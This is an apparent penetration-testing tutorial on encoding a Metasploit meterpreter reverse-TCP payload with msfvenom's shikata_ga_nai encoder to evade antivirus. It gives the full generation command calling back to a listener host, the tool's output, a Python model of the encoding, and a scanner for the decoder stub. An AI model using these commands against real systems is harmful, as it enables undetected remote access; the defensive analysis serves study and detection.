Msfvenom Encoder-Based AV Evasion in Practice

AV evasion is a practical necessity in real-world penetration tests. This article walks through encoding a Metasploit payload with msfvenom's built-in encoders so that it gets past antivirus software and returns a shell.
In the author's tests, a payload built this way bypassed most antivirus products in use in China, including but not limited to Huorong, Tencent, Baidu and Kingsoft, with a VirusTotal sandbox detection score of 12. Keep in mind that Metasploit encoders exist to strip bad characters from shellcode, not to defeat AV, and that x86/shikata_ga_nai in particular is one of the most heavily signatured encoders in the framework; figures like these reflect the engines at the time of the test and decay quickly.

First, list the encoders that ship with msfvenom. msfvenom is a standalone command-line tool and is run from the system shell, not from the msfconsole prompt:

$ msfvenom --list encoders

Output:

Framework Encoders [--encoder <value>]
======================================

    Name                     Rank       Description
    ----                     ----       -----------
    cmd/brace                low        Bash Brace Expansion Command Encoder
    cmd/echo                 good       Echo Command Encoder
    cmd/generic_sh           manual     Generic Shell Variable Substitution Command Encoder
    cmd/ifs                  low        Bourne ${IFS} Substitution Command Encoder
    cmd/perl                 normal     Perl Command Encoder
    cmd/powershell_base64    excellent  Powershell Base64 Command Encoder
    cmd/printf_php_mq        manual     printf(1) via PHP magic_quotes Utility Command Encoder
    generic/eicar            manual     The EICAR Encoder
    generic/none             normal     The "none" Encoder
    mipsbe/byte_xori         normal     Byte XORi Encoder
    mipsbe/longxor           normal     XOR Encoder
    mipsle/byte_xori         normal     Byte XORi Encoder
    mipsle/longxor           normal     XOR Encoder
    php/base64               great      PHP Base64 Encoder
    ppc/longxor              normal     PPC LongXOR Encoder
    ppc/longxor_tag          normal     PPC LongXOR Encoder
    ruby/base64              great      Ruby Base64 Encoder
    sparc/longxor_tag        normal     SPARC DWORD XOR Encoder
    x64/xor                  normal     XOR Encoder
    x64/xor_context          normal     Hostname-based Context Keyed Payload Encoder
    x64/xor_dynamic          normal     Dynamic key XOR Encoder
    x64/zutto_dekiru         manual     Zutto Dekiru
    x86/add_sub              manual     Add/Sub Encoder
    x86/alpha_mixed          low        Alpha2 Alphanumeric Mixedcase Encoder
    x86/alpha_upper          low        Alpha2 Alphanumeric Uppercase Encoder
    x86/avoid_underscore_tolower  manual  Avoid underscore/tolower
    x86/avoid_utf8_tolower   manual     Avoid UTF8/tolower
    x86/bloxor               manual     BloXor - A Metamorphic Block Based XOR Encoder
    x86/bmp_polyglot         manual     BMP Polyglot
    x86/call4_dword_xor      normal     Call+4 Dword XOR Encoder
    x86/context_cpuid        manual     CPUID-based Context Keyed Payload Encoder
    x86/context_stat         manual     stat(2)-based Context Keyed Payload Encoder
    x86/context_time         manual     time(2)-based Context Keyed Payload Encoder
    x86/countdown            normal     Single-byte XOR Countdown Encoder
    x86/fnstenv_mov          normal     Variable-length Fnstenv/mov Dword XOR Encoder
    x86/jmp_call_additive    normal     Jump/Call XOR Additive Feedback Encoder
    x86/nonalpha             low        Non-Alpha Encoder
    x86/nonupper             low        Non-Upper Encoder
    x86/opt_sub              manual     Sub Encoder (optimised)
    x86/service              manual     Register Service
    x86/shikata_ga_nai       excellent  Polymorphic XOR Additive Feedback Encoder
    x86/single_static_bit    manual     Single Static Bit
    x86/unicode_mixed        manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
    x86/unicode_upper        manual     Alpha2 Alphanumeric Unicode Uppercase Encoder
    x86/xor_dynamic          normal     Dynamic key XOR Encoder

The list shows every available encoder. This article uses x86/shikata_ga_nai, the only x86 encoder ranked excellent, as the example.
For reference, these are msfvenom's command-line options:
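To make concrete what the "Polymorphic XOR Additive Feedback Encoder" label on x86/shikata_ga_nai means, here is an added Python model of that transform. It was written for this article and is not msfvenom's Ruby implementation; it models only the body encoding, not the decoder stub's machine code. Each 4-byte little-endian block is XORed with a running key, and the key is then advanced by adding the plaintext block, which mirrors the decoder loop's "xor [ptr], key ; add key, [ptr]" pair. find_key reproduces what the -b option makes an XOR encoder do: draw random keys until neither the key nor the encoded body contains a forbidden byte. The names xaf_encode, xaf_decode, find_key and pad_to_block are this example's own, the padding rule is an assumption of the model, and SAMPLE is a constructed stand-in rather than shellcode.

```python
import os
import struct
from typing import Callable, Tuple

MASK = 0xFFFFFFFF
BLOCK = 4  # the decoder loop works on little-endian dwords


def pad_to_block(data: bytes) -> bytes:
    """Null-pad the body to whole dwords so the decoder loop never touches a partial block.
    (This model's own padding rule; how msfvenom pads the tail is not shown on the page.)"""
    return data + b"\x00" * (-len(data) % BLOCK)


def xaf_encode(payload: bytes, key: int) -> bytes:
    """XOR additive feedback: C_i = P_i ^ K_i, then K_{i+1} = (K_i + P_i) mod 2^32.
    The feedback term is the plaintext dword, because the decoder's 'add key, [ptr]'
    runs after 'xor [ptr], key' has already written the plaintext back to memory."""
    out = bytearray()
    key &= MASK
    body = pad_to_block(payload)
    for off in range(0, len(body), BLOCK):
        (p,) = struct.unpack_from("<I", body, off)
        out += struct.pack("<I", p ^ key)
        key = (key + p) & MASK
    return bytes(out)


def xaf_decode(encoded: bytes, key: int) -> bytes:
    """Mirror of the decoder loop. It must run forward from the first dword: every key
    depends on all plaintext dwords before it, so one corrupted byte breaks everything after it."""
    if len(encoded) % BLOCK:
        raise ValueError("encoded body must be a multiple of %d bytes" % BLOCK)
    out = bytearray()
    key &= MASK
    for off in range(0, len(encoded), BLOCK):
        (c,) = struct.unpack_from("<I", encoded, off)
        p = c ^ key
        out += struct.pack("<I", p)
        key = (key + p) & MASK
    return bytes(out)


def find_key(payload: bytes, badchars: bytes, tries: int = 20000,
             rng: Callable[[int], bytes] = os.urandom) -> Tuple[int, bytes]:
    """What -b makes an XOR encoder do: keep drawing random keys until neither the key
    (it is embedded as an immediate in the decoder stub) nor the encoded body contains a
    forbidden byte. The random key is also where the 'polymorphic' output comes from."""
    bad = set(badchars)
    for _ in range(tries):
        (key,) = struct.unpack("<I", rng(BLOCK))
        if bad & set(key.to_bytes(BLOCK, "little")):
            continue
        enc = xaf_encode(payload, key)
        if not (bad & set(enc)):
            return key, enc
    raise ValueError("no key avoided %r in %d tries" % (badchars, tries))


# Constructed stand-in for a payload body (22 arbitrary bytes, not shellcode); the odd
# length is deliberate so the padding step is exercised.
SAMPLE = bytes(range(0x90, 0x90 + 22))


if __name__ == "__main__":
    key, enc = find_key(SAMPLE, b"\x00\x0a\x0d")
    print("key 0x%08x body %s" % (key, enc.hex()))
    assert xaf_decode(enc, key) == pad_to_block(SAMPLE)
```

Two properties worth noticing: encoding the same body under two keys gives two unrelated byte strings (which is why repeated msfvenom runs never hash the same), and because the key is fed back from the plaintext, changing a single early dword changes every ciphertext dword after it.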

Options:
    -l, --list            <type>     List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
    -p, --payload         <payload>  Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
        --list-options               List --payload <value>'s standard, advanced and evasion options
    -f, --format          <format>   Output format (use --list formats to list)
    -e, --encoder         <encoder>  The encoder to use (use --list encoders to list)
        --service-name    <value>    The service name to use when generating a service binary
        --sec-name        <value>    The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
        --smallest                   Generate the smallest possible payload using all available encoders
        --encrypt         <value>    The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
        --encrypt-key     <value>    A key to be used for --encrypt
        --encrypt-iv      <value>    An initialization vector for --encrypt
    -a, --arch            <arch>     The architecture to use for --payload and --encoders (use --list archs to list)
        --platform        <platform> The platform for --payload (use --list platforms to list)
    -o, --out             <path>     Save the payload to a file
    -b, --bad-chars       <list>     Characters to avoid example: '\x00\xff'
    -n, --nopsled         <length>   Prepend a nopsled of [length] size on to the payload
        --pad-nops                   Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
    -s, --space           <length>   The maximum size of the resulting payload
        --encoder-space   <length>   The maximum size of the encoded payload (defaults to the -s value)
    -i, --iterations      <count>    The number of times to encode the payload
    -c, --add-code        <path>     Specify an additional win32 shellcode file to include
    -x, --template        <path>     Specify a custom executable file to use as a template
    -k, --keep                       Preserve the --template behaviour and inject the payload as a new thread
    -v, --var-name        <value>    Specify a custom variable name to use for certain output formats
    -t, --timeout         <second>   The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
    -h, --help                       Show this message

Run the following command. -i 16 requests sixteen encoding passes, and -f raw emits bare shellcode bytes, which the shell redirect writes to the output file:

$ msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 16 LHOST=192.168.0.103 LPORT=4444 -f raw > /Users/shikapy.py

Output:

Found 1 compatible encoders
Attempting to encode payload with 16 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai succeeded with size 408 (iteration=1)
x86/shikata_ga_nai succeeded with size 435 (iteration=2)
x86/shikata_ga_nai succeeded with size 462 (iteration=3)
x86/shikata_ga_nai succeeded with size 489 (iteration=4)
x86/shikata_ga_nai succeeded with size 516 (iteration=5)
x86/shikata_ga_nai succeeded with size 543 (iteration=6)
x86/shikata_ga_nai succeeded with size 570 (iteration=7)
x86/shikata_ga_nai succeeded with size 597 (iteration=8)
x86/shikata_ga_nai succeeded with size 624 (iteration=9)
x86/shikata_ga_nai succeeded with size 651 (iteration=10)
x86/shikata_ga_nai succeeded with size 678 (iteration=11)
x86/shikata_ga_nai succeeded with size 705 (iteration=12)
x86/shikata_ga_nai succeeded with size 732 (iteration=13)
x86/shikata_ga_nai succeeded with size 759 (iteration=14)
x86/shikata_ga_nai succeeded with size 786 (iteration=15)
x86/shikata_ga_nai chosen with final size 786
Payload size: 786 bytes

The encoded shellcode is now in /Users/shikapy.py. Despite the .py extension this is not a Python script but 786 bytes of raw x86 shellcode: the original payload wrapped in sixteen nested decoder stubs. As the iteration sizes above show, every pass added exactly 27 bytes, the size of the shikata_ga_nai decoder stub. Only the body is transformed on each pass; the outermost decoder stub is always in clear text, and that stub is what AV signatures key on. The file does nothing on its own and needs a loader that copies it into executable memory and jumps to it.
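Before handing the file to a loader, it is worth checking what msfvenom actually produced. The following script is an added example for this article, not part of the original write-up and not a Metasploit tool: it verifies the byte count against the "Payload size" line, lists any bytes you told the encoder to avoid, measures Shannon entropy, and scans for the fnstenv [esp-0xc] GetPC sequence (d9 74 24 f4 followed shortly by a single-byte pop) that the x86/shikata_ga_nai decoder stub uses to locate itself in memory. Because the outermost stub is never encoded, that sequence sits in clear text however many -i passes were used, which is the defender's side of this story. SAMPLE is a hand-assembled sequence built here to exercise the scanner, not bytes taken from msfvenom output; the function names and the five-byte gap allowed between fnstenv and pop are this example's own choices.

```python
import hashlib
import math
import re
import sys
from collections import Counter
from typing import Dict, Optional

# fnstenv [esp-0xc] stores the FPU environment, including the address of the last FPU
# instruction executed, just below the stack pointer; the following 'pop r32' (0x58-0x5f)
# turns that saved address into a pointer into the stub itself. The gap of up to 5 bytes
# is this example's heuristic allowance for instruction reordering.
FNSTENV_GETPC = re.compile(rb"\xd9\x74\x24\xf4.{0,5}?[\x58-\x5f]", re.DOTALL)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; uniformly random bytes approach 8.0, which is itself a heuristic AV signal."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def inspect_shellcode(data: bytes, expected_size: Optional[int] = None,
                      badchars: bytes = b"") -> Dict[str, object]:
    """Static checks on a raw (-f raw) shellcode blob."""
    bad = set(badchars)
    report: Dict[str, object] = {
        "size": len(data),
        "size_matches": expected_size is None or len(data) == expected_size,
        "sha256": hashlib.sha256(data).hexdigest(),
        "badchar_offsets": [i for i, b in enumerate(data) if b in bad],
        "entropy": shannon_entropy(data),
        "getpc_offsets": [m.start() for m in FNSTENV_GETPC.finditer(data)],
    }
    report["fnstenv_decoder_suspected"] = bool(report["getpc_offsets"])
    return report


# Hand-assembled illustration of a GetPC prologue, constructed for this example (not msfvenom
# output): fldz ; mov eax, imm32 ; fnstenv [esp-0xc] ; pop esi ; sub ecx, ecx ; mov cl, 5 ;
# xor [esi+0x13], eax ; add eax, [esi+0x13] ; loop -8 ; then a 20-byte body ending in a null.
SAMPLE = (b"\xd9\xee" + b"\xb8\x11\x22\x33\x44" + b"\xd9\x74\x24\xf4" + b"\x5e"
          + b"\x29\xc9" + b"\xb1\x05" + b"\x31\x46\x13" + b"\x03\x46\x13" + b"\xe2\xf8"
          + bytes(range(0xa0, 0xb3)) + b"\x00")


if __name__ == "__main__":
    # usage: python inspect_shellcode.py /Users/shikapy.py 786
    path = sys.argv[1]
    expected = int(sys.argv[2]) if len(sys.argv) > 2 else None
    with open(path, "rb") as fh:
        blob = fh.read()
    for k, v in inspect_shellcode(blob, expected, b"\x00").items():
        print("%-26s %s" % (k, v))
```

Run against the file generated above with the reported size of 786 as the second argument. A hit in getpc_offsets at offset 0 or a few bytes in is the expected result for shikata_ga_nai output, and it is the reason stacking more iterations does not help against engines that match on the stub rather than on the encoded body.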

A custom executable template (-x, optionally with -k to keep the template's own behaviour) or a Python loader compiled to an .exe with py2exe can improve the evasion rate further; that is outside the scope of this article.
Attached: VirusTotal scan screenshot (image not reproduced here).
